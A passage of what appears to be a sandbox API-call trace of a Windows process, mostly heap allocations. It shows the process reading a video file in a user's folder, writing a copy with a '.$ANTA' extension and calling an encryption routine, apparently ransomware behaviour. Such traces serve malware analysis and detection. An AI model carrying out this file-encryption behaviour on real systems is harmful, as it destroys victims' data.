Flags=0x0, Size=0x10) returned 0x43ca7f0 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0100.242] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0100.243] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0100.243] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0100.243] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.243] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0100.243] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0100.243] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\rggg9g4rhzvsa0kg01.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0100.244] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.244] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.244] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0100.244] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797028 [0100.244] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0100.245] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac700 | out: hHeap=0x1780000) returned 1 [0100.245] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.245] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0100.245] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a558 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a558 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.246] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0100.246] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a138 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.246] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0100.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.247] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0100.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0100.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0100.247] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.247] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\rggg9G4RHZvsA0kg01.flv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\rggg9g4rhzvsa0kg01.flv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0100.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0100.313] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.314] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0100.314] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0100.314] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0100.314] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.314] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0100.314] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0100.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.315] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0100.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0100.315] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0100.317] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0100.318] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0100.319] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x8f4f, lpOverlapped=0x0) returned 1 [0100.320] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0100.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.320] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18f4f) returned 0x4516010 [0100.320] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0100.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0100.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0100.323] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0100.323] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18f4f) returned 0x452ef68 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.324] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18f4f) returned 0x4516010 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.324] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0100.324] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0100.324] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0100.324] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c40 [0100.325] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c40 | out: hHeap=0x1780000) returned 1 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18f4f) returned 0x4516010 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26f0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2670 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.325] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca310 [0100.325] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18f4f) returned 0x499a008 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0100.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0100.326] RtlAllocateHeap (HeapHandle=0x1780000, 